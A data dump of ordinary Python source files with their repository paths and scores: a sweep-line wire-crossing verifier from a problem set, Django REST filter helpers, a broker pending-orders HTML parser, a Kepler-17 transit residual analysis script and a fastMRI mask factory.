return result
class ResultSet(object):
"""Records the result of the circuit verifier (pairs of crossing wires)."""
def __init__(self):
"""Creates an empty result set."""
self.crossings = []
def add_crossing(self, wire1, wire2):
"""Records the fact that two wires are crossing."""
self.crossings.append(sorted([wire1.name, wire2.name]))
def write_to_file(self, file):
"""Write the result to a file."""
for crossing in self.crossings:
file.write(' '.join(crossing))
file.write('\n')
class TracedResultSet(ResultSet):
"""Augments ResultSet to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
ResultSet.__init__(self)
self.trace = trace
def add_crossing(self, wire1, wire2):
self.trace.append({'type': 'crossing', 'id1': wire1.name,
'id2': wire2.name})
ResultSet.add_crossing(self, wire1, wire2)
class KeyWirePair(object):
"""Wraps a wire and the key representing it in the range index.
Once created, a key-wire pair is immutable."""
def __init__(self, key, wire):
"""Creates a new key for insertion in the range index."""
self.key = key
if wire is None:
raise ValueError('Use KeyWirePairL or KeyWirePairH for queries')
self.wire = wire
self.wire_id = wire.object_id
def __lt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id < other.wire_id))
def __le__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id <= other.wire_id))
def __gt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id > other.wire_id))
def __ge__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id >= other.wire_id))
def __eq__(self, other):
# :nodoc: Delegate comparison to keys.
return self.key == other.key and self.wire_id == other.wire_id
def __ne__(self, other):
# :nodoc: Delegate comparison to keys.
return self.key == other.key and self.wire_id == other.wire_id
def __hash__(self):
# :nodoc: Delegate comparison to keys.
return hash([self.key, self.wire_id])
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return '<key: ' + str(self.key) + ' wire: ' + str(self.wire) + '>'
class KeyWirePairL(KeyWirePair):
"""A KeyWirePair that is used as the low end of a range query.
This KeyWirePair is smaller than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
self.wire_id = -1000000000
class KeyWirePairH(KeyWirePair):
"""A KeyWirePair that is used as the high end of a range query.
This KeyWirePair is larger than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
# HACK(pwnall): assuming 1 billion objects won't fit into RAM.
self.wire_id = 1000000000
class CrossVerifier(object):
"""Checks whether a wire network has any crossing wires."""
def __init__(self, layer):
"""Verifier for a layer of wires.
Once created, the verifier can list the crossings between wires (the
wire_crossings method) or count the crossings (count_crossings)."""
self.events = []
self._events_from_layer(layer)
self.events.sort()
self.index = RangeIndex()
self.result_set = ResultSet()
self.performed = False
def count_crossings(self):
"""Returns the number of pairs of wires that cross each other."""
if self.performed:
raise
self.performed = True
return self._compute_crossings(True)
def wire_crossings(self):
"""An array of pairs of wires that cross each other."""
if self.performed:
raise
self.performed = True
return self._compute_crossings(False)
def _events_from_layer(self, layer):
"""Populates the sweep line events from the wire layer."""
left_edge = min([wire.x1 for wire in layer.wires.values()])
for wire in layer.wires.values():
if wire.is_horizontal():
self.events.append([wire.x1, 0, wire.object_id, 'add', wire])
self.events.append([wire.x2, 2, wire.object_id, 'remove', wire])
else:
self.events.append([wire.x1, 1, wire.object_id, 'query', wire])
def _compute_crossings(self, count_only):
"""Implements count_crossings and wire_crossings."""
if count_only:
result = 0
else:
result = self.result_set
for event in self.events:
event_x, event_type, wire = event[0], event[3], event[4]
if event_type == 'add':
self.trace_sweep_line(wire.x1)
self.index.add(KeyWirePair(wire.y1, wire))
elif event_type == 'remove':
self.trace_sweep_line(wire.x2)
self.index.remove(KeyWirePair(wire.y1, wire))
elif event_type == 'query':
self.trace_sweep_line(event_x)
if count_only:
result += self.index.count(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2))
else:
cross_wires = []
for kwp in self.index.list(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2)):
cross_wires.append(kwp.wire)
for cross_wire in cross_wires:
result.add_crossing(wire, cross_wire)
return result
def trace_sweep_line(self, x):
"""When tracing is enabled, adds info about where the sweep line is.
Args:
x: the coordinate of the vertical sweep line
"""
# NOTE: this is overridden in TracedCrossVerifier
pass
class TracedCrossVerifier(CrossVerifier):
"""Augments CrossVerifier to build a trace for the visualizer."""
def __init__(self, layer):
CrossVerifier.__init__(self, layer)
self.trace = []
self.index = TracedRangeIndex(self.trace)
self.result_set = TracedResultSet(self.trace)
def trace_sweep_line(self, x):
self.trace.append({'type': 'sweep', 'x': x})
def trace_as_json(self):
"""List that obeys the JSON format restrictions with the verifier trace."""
return self.trace
# Command-line controller.
if __name__ == '__main__':
import sys
layer = WireLayer.from_file(sys.stdin)
verifier = CrossVerifier(layer)
if os.environ.get('TRACE') == 'jsonp':
verifier = TracedCrossVerifier(layer)
result = verifier.wire_crossings()
json_obj = {'layer': layer.as_json(), 'trace': verifier.trace_as_json()}
sys.stdout.write('onJsonp(')
json.dump(json_obj, sys.stdout)
sys.stdout.write(');\n')
elif os.environ.get('TRACE') == 'list':
verifier.wire_crossings().write_to_file(sys.stdout)
else:
sys.stdout.write(str(verifier.count_crossings()) + "\n") | Problem sets/PS3/circuit2/circuit2.py |
import json # Used when TRACE=jsonp
import os # Used to get the TRACE environment variable
import re # Used when TRACE=jsonp
import sys # Used to smooth over the range / xrange issue.
import aug_avl
# Python 3 doesn't have xrange, and range behaves like xrange.
if sys.version_info >= (3,):
xrange = range
# Circuit verification library.
class Wire(object):
"""A wire in an on-chip circuit.
Wires are immutable, and are either horizontal or vertical.
"""
def __init__(self, name, x1, y1, x2, y2):
"""Creates a wire.
Raises an ValueError if the coordinates don't make up a horizontal wire
or a vertical wire.
Args:
name: the wire's user-visible name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
"""
# Normalize the coordinates.
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.name = name
self.x1, self.y1 = x1, y1
self.x2, self.y2 = x2, y2
self.object_id = Wire.next_object_id()
if not (self.is_horizontal() or self.is_vertical()):
raise ValueError(str(self) + ' is neither horizontal nor vertical')
def is_horizontal(self):
"""True if the wire's endpoints have the same Y coordinates."""
return self.y1 == self.y2
def is_vertical(self):
"""True if the wire's endpoints have the same X coordinates."""
return self.x1 == self.x2
def intersects(self, other_wire):
"""True if this wire intersects another wire."""
# NOTE: we assume that wires can only cross, but not overlap.
if self.is_horizontal() == other_wire.is_horizontal():
return False
if self.is_horizontal():
h = self
v = other_wire
else:
h = other_wire
v = self
return v.y1 <= h.y1 and h.y1 <= v.y2 and h.x1 <= v.x1 and v.x1 <= h.x2
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return('<wire ' + self.name + ' (' + str(self.x1) + ',' + str(self.y1) +
')-(' + str(self.x2) + ',' + str(self.y2) + ')>')
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the wire."""
return {'id': self.name, 'x': [self.x1, self.x2], 'y': [self.y1, self.y2]}
# Next number handed out by Wire.next_object_id()
_next_id = 0
@staticmethod
def next_object_id():
"""Returns a unique numerical ID to be used as a Wire's object_id."""
id = Wire._next_id
Wire._next_id += 1
return id
class WireLayer(object):
"""The layout of one layer of wires in a chip."""
def __init__(self):
"""Creates a layer layout with no wires."""
self.wires = {}
def wires(self):
"""The wires in the layout."""
self.wires.values()
def add_wire(self, name, x1, y1, x2, y2):
"""Adds a wire to a layer layout.
Args:
name: the wire's unique name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
Raises an exception if the wire isn't perfectly horizontal (y1 = y2) or
perfectly vertical (x1 = x2)."""
if name in self.wires:
raise ValueError('Wire name ' + name + ' not unique')
self.wires[name] = Wire(name, x1, y1, x2, y2)
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the layout."""
return { 'wires': [wire.as_json() for wire in self.wires.values()] }
@staticmethod
def from_file(file):
"""Builds a wire layer layout by reading a textual description from a file.
Args:
file: a File object supplying the input
Returns a new Simulation instance."""
layer = WireLayer()
while True:
command = file.readline().split()
if command[0] == 'wire':
coordinates = [float(token) for token in command[2:6]]
layer.add_wire(command[1], *coordinates)
elif command[0] == 'done':
break
return layer
class RangeIndex(object):
"""Array-based range index implementation."""
def __init__(self):
"""Initially empty range index."""
self.data = aug_avl.AugAVL()
def add(self, key):
"""Inserts a key in the range index."""
if key is None:
raise ValueError('Cannot insert nil in the index')
self.data.insert(key)
def remove(self, key):
"""Removes a key from the range index."""
self.data.delete(key)
def list(self, first_key, last_key):
"""List of values for the keys that fall within [first_key, last_key]."""
return self.data.list(first_key, last_key)
def count(self, first_key, last_key):
"""Number of keys that fall within [first_key, last_key]."""
return self.data.count(first_key, last_key)
class TracedRangeIndex(RangeIndex):
"""Augments RangeIndex to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
RangeIndex.__init__(self)
self.trace = trace
def add(self, key):
self.trace.append({'type': 'add', 'id': key.wire.name})
RangeIndex.add(self, key)
def remove(self, key):
self.trace.append({'type': 'delete', 'id': key.wire.name})
RangeIndex.remove(self, key)
def list(self, first_key, last_key):
result = RangeIndex.list(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key,
'ids': [key.wire.name for key in result]})
return result
def count(self, first_key, last_key):
result = RangeIndex.count(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key, 'count': result})
return result
class ResultSet(object):
"""Records the result of the circuit verifier (pairs of crossing wires)."""
def __init__(self):
"""Creates an empty result set."""
self.crossings = []
def add_crossing(self, wire1, wire2):
"""Records the fact that two wires are crossing."""
self.crossings.append(sorted([wire1.name, wire2.name]))
def write_to_file(self, file):
"""Write the result to a file."""
for crossing in self.crossings:
file.write(' '.join(crossing))
file.write('\n')
class TracedResultSet(ResultSet):
"""Augments ResultSet to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
ResultSet.__init__(self)
self.trace = trace
def add_crossing(self, wire1, wire2):
self.trace.append({'type': 'crossing', 'id1': wire1.name,
'id2': wire2.name})
ResultSet.add_crossing(self, wire1, wire2)
class KeyWirePair(object):
"""Wraps a wire and the key representing it in the range index.
Once created, a key-wire pair is immutable."""
def __init__(self, key, wire):
"""Creates a new key for insertion in the range index."""
self.key = key
if wire is None:
raise ValueError('Use KeyWirePairL or KeyWirePairH for queries')
self.wire = wire
self.wire_id = wire.object_id
def __lt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id < other.wire_id))
def __le__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key < other.key or
(self.key == other.key and self.wire_id <= other.wire_id))
def __gt__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id > other.wire_id))
def __ge__(self, other):
# :nodoc: Delegate comparison to keys.
return (self.key > other.key or
(self.key == other.key and self.wire_id >= other.wire_id))
def __eq__(self, other):
# :nodoc: Delegate comparison to keys.
return self.key == other.key and self.wire_id == other.wire_id
def __ne__(self, other):
# :nodoc: Delegate comparison to keys.
return self.key == other.key and self.wire_id == other.wire_id
def __hash__(self):
# :nodoc: Delegate comparison to keys.
return hash([self.key, self.wire_id])
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return '<key: ' + str(self.key) + ' wire: ' + str(self.wire) + '>'
class KeyWirePairL(KeyWirePair):
"""A KeyWirePair that is used as the low end of a range query.
This KeyWirePair is smaller than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
self.wire_id = -1000000000
class KeyWirePairH(KeyWirePair):
"""A KeyWirePair that is used as the high end of a range query.
This KeyWirePair is larger than all other KeyWirePairs with the same key."""
def __init__(self, key):
self.key = key
self.wire = None
# HACK(pwnall): assuming 1 billion objects won't fit into RAM.
self.wire_id = 1000000000
class CrossVerifier(object):
"""Checks whether a wire network has any crossing wires."""
def __init__(self, layer):
"""Verifier for a layer of wires.
Once created, the verifier can list the crossings between wires (the
wire_crossings method) or count the crossings (count_crossings)."""
self.events = []
self._events_from_layer(layer)
self.events.sort()
self.index = RangeIndex()
self.result_set = ResultSet()
self.performed = False
def count_crossings(self):
"""Returns the number of pairs of wires that cross each other."""
if self.performed:
raise
self.performed = True
return self._compute_crossings(True)
def wire_crossings(self):
"""An array of pairs of wires that cross each other."""
if self.performed:
raise
self.performed = True
return self._compute_crossings(False)
def _events_from_layer(self, layer):
"""Populates the sweep line events from the wire layer."""
left_edge = min([wire.x1 for wire in layer.wires.values()])
for wire in layer.wires.values():
if wire.is_horizontal():
self.events.append([wire.x1, 0, wire.object_id, 'add', wire])
self.events.append([wire.x2, 2, wire.object_id, 'remove', wire])
else:
self.events.append([wire.x1, 1, wire.object_id, 'query', wire])
def _compute_crossings(self, count_only):
"""Implements count_crossings and wire_crossings."""
if count_only:
result = 0
else:
result = self.result_set
for event in self.events:
event_x, event_type, wire = event[0], event[3], event[4]
if event_type == 'add':
self.trace_sweep_line(wire.x1)
self.index.add(KeyWirePair(wire.y1, wire))
elif event_type == 'remove':
self.trace_sweep_line(wire.x2)
self.index.remove(KeyWirePair(wire.y1, wire))
elif event_type == 'query':
self.trace_sweep_line(event_x)
if count_only:
result += self.index.count(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2))
else:
cross_wires = []
for kwp in self.index.list(KeyWirePairL(wire.y1), KeyWirePairH(wire.y2)):
cross_wires.append(kwp.wire)
for cross_wire in cross_wires:
result.add_crossing(wire, cross_wire)
return result
def trace_sweep_line(self, x):
"""When tracing is enabled, adds info about where the sweep line is.
Args:
x: the coordinate of the vertical sweep line
"""
# NOTE: this is overridden in TracedCrossVerifier
pass
class TracedCrossVerifier(CrossVerifier):
"""Augments CrossVerifier to build a trace for the visualizer."""
def __init__(self, layer):
CrossVerifier.__init__(self, layer)
self.trace = []
self.index = TracedRangeIndex(self.trace)
self.result_set = TracedResultSet(self.trace)
def trace_sweep_line(self, x):
self.trace.append({'type': 'sweep', 'x': x})
def trace_as_json(self):
"""List that obeys the JSON format restrictions with the verifier trace."""
return self.trace
# Command-line controller.
if __name__ == '__main__':
import sys
layer = WireLayer.from_file(sys.stdin)
verifier = CrossVerifier(layer)
if os.environ.get('TRACE') == 'jsonp':
verifier = TracedCrossVerifier(layer)
result = verifier.wire_crossings()
json_obj = {'layer': layer.as_json(), 'trace': verifier.trace_as_json()}
sys.stdout.write('onJsonp(')
json.dump(json_obj, sys.stdout)
sys.stdout.write(');\n')
elif os.environ.get('TRACE') == 'list':
verifier.wire_crossings().write_to_file(sys.stdout)
else:
sys.stdout.write(str(verifier.count_crossings()) + "\n") | 0.651577 | 0.467089 |
from typing import Type
import coreapi
import coreschema
from django.db.models import Choices, IntegerChoices
from rest_framework.filters import BaseFilterBackend
class BaseKeyFilter(BaseFilterBackend):
"""Filter by foreign or primary key implementation."""
key: str
def _get_pk_parameter(self, params):
if self.key not in params:
return None
else:
return [int(key) for key in params[self.key].split(",")]
def filter_queryset(self, request, queryset, view):
"""Parse pk parameter, filter results."""
params = request.query_params
filtered_ids = self._get_pk_parameter(params)
if filtered_ids is not None:
queryset = queryset.filter(**{f"{self.key}__in": filtered_ids})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.key,
required=False,
location="query",
schema=coreschema.String(description=f"filter objects by {self.key}"),
),
]
class BaseChoicesFilter(BaseFilterBackend):
"""Filter by choice field implementation."""
choices: Type[Choices] # allowed choices
field: str # choice field
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
return [
choice
for choice in params[self.field].split(",")
if choice in self.choices.values
]
def filter_queryset(self, request, queryset, view):
"""Parse choice field parameter, filter results."""
params = request.query_params
filtered_choices = self._get_choice_parameter(params)
if filtered_choices is not None:
queryset = queryset.filter(**{f"{self.field}__in": filtered_choices})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.field,
required=False,
location="query",
schema=coreschema.String(
description=f"filter objects by {self.field}",
),
),
]
class BaseIntegerChoicesFilter(BaseChoicesFilter):
"""Filter by integer choice field implementation."""
choices: IntegerChoices
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
return [
int(choice)
for choice in params[self.field].split(",")
if choice in self.choices.values and choice.isdigit()
]
def key_filter(key_: str):
class DynamicFilter(BaseKeyFilter):
key = key_
return DynamicFilter
def choices_filter(choices_: Type[Choices], field_: str) -> Type[BaseChoicesFilter]:
class DynamicFilter(BaseChoicesFilter):
choices = choices_
field = field_
return DynamicFilter
def integer_choices_filter(
choices_: IntegerChoices, field_: str
) -> Type[BaseIntegerChoicesFilter]:
class DynamicFilter(BaseIntegerChoicesFilter):
choices = choices_
field = field_
return DynamicFilter | django_boilerplate/common/drf_helpers/filters.py | from typing import Type
import coreapi
import coreschema
from django.db.models import Choices, IntegerChoices
from rest_framework.filters import BaseFilterBackend
class BaseKeyFilter(BaseFilterBackend):
"""Filter by foreign or primary key implementation."""
key: str
def _get_pk_parameter(self, params):
if self.key not in params:
return None
else:
return [int(key) for key in params[self.key].split(",")]
def filter_queryset(self, request, queryset, view):
"""Parse pk parameter, filter results."""
params = request.query_params
filtered_ids = self._get_pk_parameter(params)
if filtered_ids is not None:
queryset = queryset.filter(**{f"{self.key}__in": filtered_ids})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.key,
required=False,
location="query",
schema=coreschema.String(description=f"filter objects by {self.key}"),
),
]
class BaseChoicesFilter(BaseFilterBackend):
"""Filter by choice field implementation."""
choices: Type[Choices] # allowed choices
field: str # choice field
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
return [
choice
for choice in params[self.field].split(",")
if choice in self.choices.values
]
def filter_queryset(self, request, queryset, view):
"""Parse choice field parameter, filter results."""
params = request.query_params
filtered_choices = self._get_choice_parameter(params)
if filtered_choices is not None:
queryset = queryset.filter(**{f"{self.field}__in": filtered_choices})
return queryset
def get_schema_fields(self, view):
"""Return schema for filter parameters."""
return [
coreapi.Field(
name=self.field,
required=False,
location="query",
schema=coreschema.String(
description=f"filter objects by {self.field}",
),
),
]
class BaseIntegerChoicesFilter(BaseChoicesFilter):
"""Filter by integer choice field implementation."""
choices: IntegerChoices
def _get_choice_parameter(self, params):
"""Filter unsupported values"""
if self.field not in params:
return None
else:
return [
int(choice)
for choice in params[self.field].split(",")
if choice in self.choices.values and choice.isdigit()
]
def key_filter(key_: str):
class DynamicFilter(BaseKeyFilter):
key = key_
return DynamicFilter
def choices_filter(choices_: Type[Choices], field_: str) -> Type[BaseChoicesFilter]:
class DynamicFilter(BaseChoicesFilter):
choices = choices_
field = field_
return DynamicFilter
def integer_choices_filter(
choices_: IntegerChoices, field_: str
) -> Type[BaseIntegerChoicesFilter]:
class DynamicFilter(BaseIntegerChoicesFilter):
choices = choices_
field = field_
return DynamicFilter | 0.845017 | 0.206844 |
import re
from typing import List
from bs4 import BeautifulSoup
from ...orders.pending.models import PendingOrder
from ...utils.input import InputHelper
def parse_pending_orders(account_id: int, pending_orders_html: str) -> List[PendingOrder]:
pending_orders = []
soup = BeautifulSoup(pending_orders_html, 'html.parser')
pending_orders_table = soup.select_one('table[summary="Your current pending orders"]')
if pending_orders_table is None:
return pending_orders
# Order date Code Quantity Stock Order type Limit price Status Cancel
header_rows = pending_orders_table.select("thead > tr > th")
if len(header_rows) != 8:
raise Exception(
f"Unexpected number of header rows({len(header_rows)}), see HTML for more details",
pending_orders_table.text)
row_data = []
table_rows = pending_orders_table.select("tbody > tr")
for table_row in table_rows:
row_cells = table_row.select("td")
if len(row_cells) != 8:
raise Exception(f"Unexpected number of cells({len(row_cells)}), see HTML for more details",
pending_orders_table.text)
cell_data = {}
for col_index in range(len(header_rows)):
item_key = header_rows[col_index].get_text(strip=True, separator=' ')
if item_key == 'Cancel':
cancel_button = row_cells[col_index].select_one('button')
item_value = re.findall("value='(\\d*)'", cancel_button.attrs['onclick'])[0]
else:
item_value = row_cells[col_index].get_text(strip=True, separator=' ')
cell_data[item_key] = item_value
row_data.append(cell_data)
for row in row_data:
order_id = InputHelper.parse_int(row['Cancel'])
order_date = InputHelper.parse_date(input_txt=row['Order date'], date_format='%d/%m/%y')
trade_type = str(pending_orders_table.select_one(f"input[name='{order_id}_trade_type[]']").attrs['value'])
sedol_code = str(pending_orders_table.select_one(f"input[name='{order_id}_sedol[]']").attrs['value'])
stock_title = str(pending_orders_table.select_one(f"input[name='{order_id}_stoktitle[]']").attrs['value'])
quantity = InputHelper.parse_float(
pending_orders_table.select_one(f"input[name='{order_id}_quantity[]']").attrs['value'])
qty_is_money = InputHelper.parse_bool(
pending_orders_table.select_one(f"input[name='{order_id}_qty_is_money[]']").attrs['value'])
limit_price = InputHelper.parse_float(row['Limit price'], default_empty=None, empty_values=['', '-'])
status = str(row['Status'])
pending_order = PendingOrder(
account_id=account_id,
order_id=order_id,
order_date=order_date,
trade_type=trade_type,
sedol_code=sedol_code,
stock_title=stock_title,
quantity=quantity,
qty_is_money=qty_is_money,
limit_price=limit_price,
status=status
)
pending_orders.append(pending_order)
return pending_orders | hargreaves/orders/pending/parsers.py | import re
from typing import List
from bs4 import BeautifulSoup
from ...orders.pending.models import PendingOrder
from ...utils.input import InputHelper
def parse_pending_orders(account_id: int, pending_orders_html: str) -> List[PendingOrder]:
pending_orders = []
soup = BeautifulSoup(pending_orders_html, 'html.parser')
pending_orders_table = soup.select_one('table[summary="Your current pending orders"]')
if pending_orders_table is None:
return pending_orders
# Order date Code Quantity Stock Order type Limit price Status Cancel
header_rows = pending_orders_table.select("thead > tr > th")
if len(header_rows) != 8:
raise Exception(
f"Unexpected number of header rows({len(header_rows)}), see HTML for more details",
pending_orders_table.text)
row_data = []
table_rows = pending_orders_table.select("tbody > tr")
for table_row in table_rows:
row_cells = table_row.select("td")
if len(row_cells) != 8:
raise Exception(f"Unexpected number of cells({len(row_cells)}), see HTML for more details",
pending_orders_table.text)
cell_data = {}
for col_index in range(len(header_rows)):
item_key = header_rows[col_index].get_text(strip=True, separator=' ')
if item_key == 'Cancel':
cancel_button = row_cells[col_index].select_one('button')
item_value = re.findall("value='(\\d*)'", cancel_button.attrs['onclick'])[0]
else:
item_value = row_cells[col_index].get_text(strip=True, separator=' ')
cell_data[item_key] = item_value
row_data.append(cell_data)
for row in row_data:
order_id = InputHelper.parse_int(row['Cancel'])
order_date = InputHelper.parse_date(input_txt=row['Order date'], date_format='%d/%m/%y')
trade_type = str(pending_orders_table.select_one(f"input[name='{order_id}_trade_type[]']").attrs['value'])
sedol_code = str(pending_orders_table.select_one(f"input[name='{order_id}_sedol[]']").attrs['value'])
stock_title = str(pending_orders_table.select_one(f"input[name='{order_id}_stoktitle[]']").attrs['value'])
quantity = InputHelper.parse_float(
pending_orders_table.select_one(f"input[name='{order_id}_quantity[]']").attrs['value'])
qty_is_money = InputHelper.parse_bool(
pending_orders_table.select_one(f"input[name='{order_id}_qty_is_money[]']").attrs['value'])
limit_price = InputHelper.parse_float(row['Limit price'], default_empty=None, empty_values=['', '-'])
status = str(row['Status'])
pending_order = PendingOrder(
account_id=account_id,
order_id=order_id,
order_date=order_date,
trade_type=trade_type,
sedol_code=sedol_code,
stock_title=stock_title,
quantity=quantity,
qty_is_money=qty_is_money,
limit_price=limit_price,
status=status
)
pending_orders.append(pending_order)
return pending_orders | 0.404743 | 0.144873 |
from __future__ import absolute_import, print_function
from glob import glob
from friedrich.lightcurve import (LightCurve, generate_lc_depth,
kepler17_params_db)
from friedrich.fitting import peak_finder, summed_gaussians, gaussian
import matplotlib.pyplot as plt
import numpy as np
from astropy.utils.console import ProgressBar
# Settings:
plots = True
light_curve_paths = glob('/Users/bmmorris/data/kepler17/*slc.fits')
depth = 0.13031**2
kepler17_params = kepler17_params_db()
# Construct light curve object from the raw data
whole_lc = LightCurve.from_raw_fits(light_curve_paths, name='Kepler17')
transits = LightCurve(**whole_lc.mask_out_of_transit(kepler17_params)
).get_transit_light_curves(kepler17_params)
delta_chi2 = {}
with ProgressBar(len(transits)) as bar:
for i, lc in enumerate(transits):
# Remove linear out-of-transit trend from transit
lc.remove_linear_baseline(kepler17_params)
# Subtract out a transit model
transit_model = generate_lc_depth(lc.times_jd, depth, kepler17_params)
residuals = lc.fluxes - transit_model
# Find peaks in the light curve residuals
best_fit_params = peak_finder(lc.times.jd, residuals, lc.errors,
kepler17_params)
best_fit_gaussian_model = summed_gaussians(lc.times.jd, best_fit_params)
# Measure delta chi^2
chi2_transit = np.sum((lc.fluxes - transit_model)**2 /
lc.errors**2)/len(lc.fluxes)
if best_fit_params is not None:
split_input_parameters = np.split(np.array(best_fit_params),
len(best_fit_params)/3)
delta_chi2[i] = []
for amplitude, t0, sigma in split_input_parameters:
model_i = gaussian(lc.times.jd, amplitude, t0, sigma)
chi2_bumps = np.sum((lc.fluxes - transit_model - model_i)**2 /
lc.errors**2)/len(lc.fluxes)
delta_chi2[i].append(np.abs(chi2_transit - chi2_bumps))
if plots:
fig, ax = plt.subplots(3, 1, figsize=(8, 14), sharex=True)
ax[0].errorbar(lc.times.jd, lc.fluxes, lc.errors, fmt='.',
color='k')
ax[0].plot(lc.times.jd, transit_model, 'r')
ax[0].set(ylabel='Flux')
ax[1].axhline(0, color='gray', ls='--')
ax[1].errorbar(lc.times.jd, lc.fluxes - transit_model,
fmt='.', color='k')
ax[1].plot(lc.times.jd, best_fit_gaussian_model, color='r')
ax[1].set_ylabel('Transit Residuals')
ax[2].axhline(0, color='gray', ls='--')
ax[2].errorbar(lc.times.jd, lc.fluxes - transit_model -
best_fit_gaussian_model, fmt='.', color='k')
ax[2].set_ylabel('Gaussian Residuals')
ax[2].set_title(r'$Delta \chi^2$ = '+'{0}'
.format(delta_chi2[i]))
fig.savefig('plots/{0:03d}.png'.format(i))
#plt.show()
plt.close()
bar.update()
all_delta_chi2 = np.concatenate(list(delta_chi2.values())).ravel()
fig, ax = plt.subplots(1,figsize=(12, 6))
ax.plot(np.log10(all_delta_chi2), '.')
plt.show() | example_k17.py | from __future__ import absolute_import, print_function
from glob import glob
from friedrich.lightcurve import (LightCurve, generate_lc_depth,
kepler17_params_db)
from friedrich.fitting import peak_finder, summed_gaussians, gaussian
import matplotlib.pyplot as plt
import numpy as np
from astropy.utils.console import ProgressBar
# Settings:
plots = True
light_curve_paths = glob('/Users/bmmorris/data/kepler17/*slc.fits')
depth = 0.13031**2
kepler17_params = kepler17_params_db()
# Construct light curve object from the raw data
whole_lc = LightCurve.from_raw_fits(light_curve_paths, name='Kepler17')
transits = LightCurve(**whole_lc.mask_out_of_transit(kepler17_params)
).get_transit_light_curves(kepler17_params)
delta_chi2 = {}
with ProgressBar(len(transits)) as bar:
for i, lc in enumerate(transits):
# Remove linear out-of-transit trend from transit
lc.remove_linear_baseline(kepler17_params)
# Subtract out a transit model
transit_model = generate_lc_depth(lc.times_jd, depth, kepler17_params)
residuals = lc.fluxes - transit_model
# Find peaks in the light curve residuals
best_fit_params = peak_finder(lc.times.jd, residuals, lc.errors,
kepler17_params)
best_fit_gaussian_model = summed_gaussians(lc.times.jd, best_fit_params)
# Measure delta chi^2
chi2_transit = np.sum((lc.fluxes - transit_model)**2 /
lc.errors**2)/len(lc.fluxes)
if best_fit_params is not None:
split_input_parameters = np.split(np.array(best_fit_params),
len(best_fit_params)/3)
delta_chi2[i] = []
for amplitude, t0, sigma in split_input_parameters:
model_i = gaussian(lc.times.jd, amplitude, t0, sigma)
chi2_bumps = np.sum((lc.fluxes - transit_model - model_i)**2 /
lc.errors**2)/len(lc.fluxes)
delta_chi2[i].append(np.abs(chi2_transit - chi2_bumps))
if plots:
fig, ax = plt.subplots(3, 1, figsize=(8, 14), sharex=True)
ax[0].errorbar(lc.times.jd, lc.fluxes, lc.errors, fmt='.',
color='k')
ax[0].plot(lc.times.jd, transit_model, 'r')
ax[0].set(ylabel='Flux')
ax[1].axhline(0, color='gray', ls='--')
ax[1].errorbar(lc.times.jd, lc.fluxes - transit_model,
fmt='.', color='k')
ax[1].plot(lc.times.jd, best_fit_gaussian_model, color='r')
ax[1].set_ylabel('Transit Residuals')
ax[2].axhline(0, color='gray', ls='--')
ax[2].errorbar(lc.times.jd, lc.fluxes - transit_model -
best_fit_gaussian_model, fmt='.', color='k')
ax[2].set_ylabel('Gaussian Residuals')
ax[2].set_title(r'$Delta \chi^2$ = '+'{0}'
.format(delta_chi2[i]))
fig.savefig('plots/{0:03d}.png'.format(i))
#plt.show()
plt.close()
bar.update()
all_delta_chi2 = np.concatenate(list(delta_chi2.values())).ravel()
fig, ax = plt.subplots(1,figsize=(12, 6))
ax.plot(np.log10(all_delta_chi2), '.')
plt.show() | 0.769946 | 0.354517 |
from typing import Optional, Sequence
import numpy as np
from fastmri.data.subsample import MaskFunc, RandomMaskFunc
def create_mask_for_mask_type(
mask_type_str: str,
center_fractions: Sequence[float],
accelerations: Sequence[int],
skip_low_freqs: bool,
) -> MaskFunc:
"""
Creates a mask of the specified type.
Args:
center_fractions: What fraction of the center of k-space to include.
accelerations: What accelerations to apply.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should be.
Set this `True` to guarantee the same number of sampled lines for
all masks with a given (acceleration, center_fraction) setting.
Returns:
A mask func for the target mask type.
"""
if mask_type_str == "random":
return RandomMaskFunc(center_fractions, accelerations)
